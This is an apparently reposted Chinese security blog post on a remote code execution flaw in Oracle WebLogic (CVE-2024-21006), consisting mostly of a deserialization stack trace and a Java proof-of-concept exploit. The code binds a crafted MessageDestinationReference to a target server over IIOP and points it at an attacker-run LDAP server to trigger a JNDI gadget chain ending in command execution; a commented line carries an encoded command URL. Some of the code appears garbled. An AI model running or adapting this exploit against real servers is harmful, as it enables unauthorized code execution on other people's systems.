Weblogic RCE(CVE-2024-21006)

渗透技巧 1个月前 admin
222 0 0

漏洞复现

Weblogic RCE(CVE-2024-21006)




漏洞原理

经典JDNI,没啥好分析的。

exec:443, Runtime (java.lang)exec:347, Runtime (java.lang)<clinit>:-1, Pwner572504195750900 (ysoserial)newInstance0:-1, NativeConstructorAccessorImpl (sun.reflect)newInstance:62, NativeConstructorAccessorImpl (sun.reflect)newInstance:45, DelegatingConstructorAccessorImpl (sun.reflect)newInstance:423, Constructor (java.lang.reflect)newInstance:442, Class (java.lang)getTransletInstance:455, TemplatesImpl (com.sun.org.apache.xalan.internal.xsltc.trax)newTransformer:486, TemplatesImpl (com.sun.org.apache.xalan.internal.xsltc.trax)getOutputProperties:507, TemplatesImpl (com.sun.org.apache.xalan.internal.xsltc.trax)invoke0:-1, NativeMethodAccessorImpl (sun.reflect)invoke:62, NativeMethodAccessorImpl (sun.reflect)invoke:43, DelegatingMethodAccessorImpl (sun.reflect)invoke:498, Method (java.lang.reflect)serializeAsField:688, BeanPropertyWriter (com.fasterxml.jackson.databind.ser)serializeFields:772, BeanSerializerBase (com.fasterxml.jackson.databind.ser.std)serialize:178, BeanSerializer (com.fasterxml.jackson.databind.ser)defaultSerializeValue:1150, SerializerProvider (com.fasterxml.jackson.databind)serialize:115, POJONode (com.fasterxml.jackson.databind.node)_serializeNonRecursive:105, InternalNodeMapper$WrapperForSerializer (com.fasterxml.jackson.databind.node)serialize:85, InternalNodeMapper$WrapperForSerializer (com.fasterxml.jackson.databind.node)serialize:39, SerializableSerializer (com.fasterxml.jackson.databind.ser.std)serialize:20, SerializableSerializer (com.fasterxml.jackson.databind.ser.std)_serialize:479, DefaultSerializerProvider (com.fasterxml.jackson.databind.ser)serializeValue:318, DefaultSerializerProvider (com.fasterxml.jackson.databind.ser)serialize:1572, ObjectWriter$Prefetch (com.fasterxml.jackson.databind)_writeValueAndClose:1273, ObjectWriter (com.fasterxml.jackson.databind)writeValueAsString:1140, ObjectWriter (com.fasterxml.jackson.databind)nodeToString:34, InternalNodeMapper (com.fasterxml.jackson.databind.node)toString:242, BaseJsonNode (com.fasterxml.jackson.databind.node)readObject:86, BadAttributeValueExpException (javax.management)invoke0:-1, NativeMethodAccessorImpl (sun.reflect)invoke:62, NativeMethodAccessorImpl (sun.reflect)invoke:43, DelegatingMethodAccessorImpl (sun.reflect)invoke:498, Method (java.lang.reflect)invokeReadObject:1058, ObjectStreamClass (java.io)readSerialData:1909, ObjectInputStream (java.io)readOrdinaryObject:1808, ObjectInputStream (java.io)readObject0:1353, ObjectInputStream (java.io)readObject:373, ObjectInputStream (java.io)readObject:1404, HashMap (java.util)invoke:-1, GeneratedMethodAccessor2 (sun.reflect)invoke:43, DelegatingMethodAccessorImpl (sun.reflect)invoke:498, Method (java.lang.reflect)invokeReadObject:1058, ObjectStreamClass (java.io)readSerialData:1909, ObjectInputStream (java.io)readOrdinaryObject:1808, ObjectInputStream (java.io)readObject0:1353, ObjectInputStream (java.io)readObject:373, ObjectInputStream (java.io)deserializeObject:531, Obj (com.sun.jndi.ldap)decodeObject:239, Obj (com.sun.jndi.ldap)c_lookup:1051, LdapCtx (com.sun.jndi.ldap)p_lookup:542, ComponentContext (com.sun.jndi.toolkit.ctx)lookup:177, PartialCompositeContext (com.sun.jndi.toolkit.ctx)lookup:205, GenericURLContext (com.sun.jndi.toolkit.url)lookup:94, ldapURLContext (com.sun.jndi.url.ldap)lookup:417, InitialContext (javax.naming)lookupMessageDestination:76, MessageDestinationReference (weblogic.application.naming)getObjectInstance:20, MessageDestinationObjectFactory (weblogic.application.naming)getObjectInstance:321, NamingManager (javax.naming.spi)lookup:308, WLEventContextImpl (weblogic.jndi.internal)lookup:435, WLContextImpl (weblogic.jndi.internal)lookup:417, InitialContext (javax.naming)resolveObject:461, NamingContextImpl (weblogic.corba.cos.naming)resolve_any:368, NamingContextImpl (weblogic.corba.cos.naming)_invoke:114, _NamingContextAnyImplBase (weblogic.corba.cos.naming)invoke:249, CorbaServerRef (weblogic.corba.idl)invoke:246, ClusterableServerRef (weblogic.rmi.cluster)run:564, BasicServerRef$3 (weblogic.rmi.internal)doAs:386, AuthenticatedSubject (weblogic.security.acl.internal)runAs:163, SecurityManager (weblogic.security.service)handleRequest:561, BasicServerRef (weblogic.rmi.internal)run:138, WLSExecuteRequest (weblogic.rmi.internal.wls)_runAs:352, ComponentInvocationContextManager (weblogic.invocation)runAs:337, ComponentInvocationContextManager (weblogic.invocation)doRunWorkUnderContext:57, LivePartitionUtility (weblogic.work)runWorkUnderContext:41, PartitionUtility (weblogic.work)runWorkUnderContext:655, SelfTuningWorkManagerImpl (weblogic.work)execute:420, ExecuteThread (weblogic.work)run:360, ExecuteThread (weblogic.work)

In weblogic.application.naming.MessageDestinationObjectFactory#getObjectInstance method we can control the obj argument as a MessageDestinationReference instance will be call weblogic.application.naming.MessageDestinationReference#lookupMessageDestination method, in the method we can play jndi attack.

Weblogic RCE(CVE-2024-21006)




POC

Just for security test.
package org.example;
import weblogic.j2ee.descriptor.InjectionTargetBean;import weblogic.j2ee.descriptor.MessageDestinationRefBean;
import javax.naming.*;import java.util.Hashtable;
public class MessageDestinationReference {
public static void main(String[] args) throws Exception { String ip = "192.168.31.69"; String port = "7001";// String rmiurl = "ldap://192.168.0.103/cVLtcNoHML/Plain/Exec/eyJjbWQiOiJ0b3VjaCAvdG1wL3N1Y2Nlc3MxMjMifQ=="; String rhost = String.format("iiop://%s:%s", ip, port);
Hashtable<String, String> env = new Hashtable<String, String>(); // add wlsserver/server/lib/weblogic.jar to classpath,else will error. env.put("java.naming.factory.initial", "weblogic.jndi.WLInitialContextFactory"); env.put(Context.PROVIDER_URL, rhost); Context context = new InitialContext(env);// Reference reference = new Reference("weblogic.application.naming.MessageDestinationObjectFactory","weblogic.application.naming.MessageDestinationObjectFactory",""); weblogic.application.naming.MessageDestinationReference messageDestinationReference=new weblogic.application.naming.MessageDestinationReference(null, new MessageDestinationRefBean() { @Override public String[] getDescriptions() { return new String[0]; }
@Override public void addDescription(String s) {
}
@Override public void removeDescription(String s) {
}
@Override public void setDescriptions(String[] strings) {
}
@Override public String getMessageDestinationRefName() { return null; }
@Override public void setMessageDestinationRefName(String s) {
}
@Override public String getMessageDestinationType() { return "weblogic.application.naming.MessageDestinationReference"; }
@Override public void setMessageDestinationType(String s) {
}
@Override public String getMessageDestinationUsage() { return null; }
@Override public void setMessageDestinationUsage(String s) {
}
@Override public String getMessageDestinationLink() { return null; }
@Override public void setMessageDestinationLink(String s) {
}
@Override public String getMappedName() { return null; }
@Override public void setMappedName(String s) {
}
@Override public InjectionTargetBean[] getInjectionTargets() { return new InjectionTargetBean[0]; }
@Override public InjectionTargetBean createInjectionTarget() { return null; }
@Override public void destroyInjectionTarget(InjectionTargetBean injectionTargetBean) {
}
@Override public String getLookupName() { return null; }
@Override public void setLookupName(String s) {
}
@Override public String getId() { return null; }
@Override public void setId(String s) {
}        }, "ldap://127.0.0.1:1389/deserialJackson"nullnull);
        context.bind("L0ne1y",messageDestinationReference); context.lookup("L0ne1y"); }}



原文始发于微信公众号(安全之道):Weblogic RCE(CVE-2024-21006)

版权声明:admin 发表于 2024年4月18日 上午10:03。
转载请注明:Weblogic RCE(CVE-2024-21006) | CTF导航

相关文章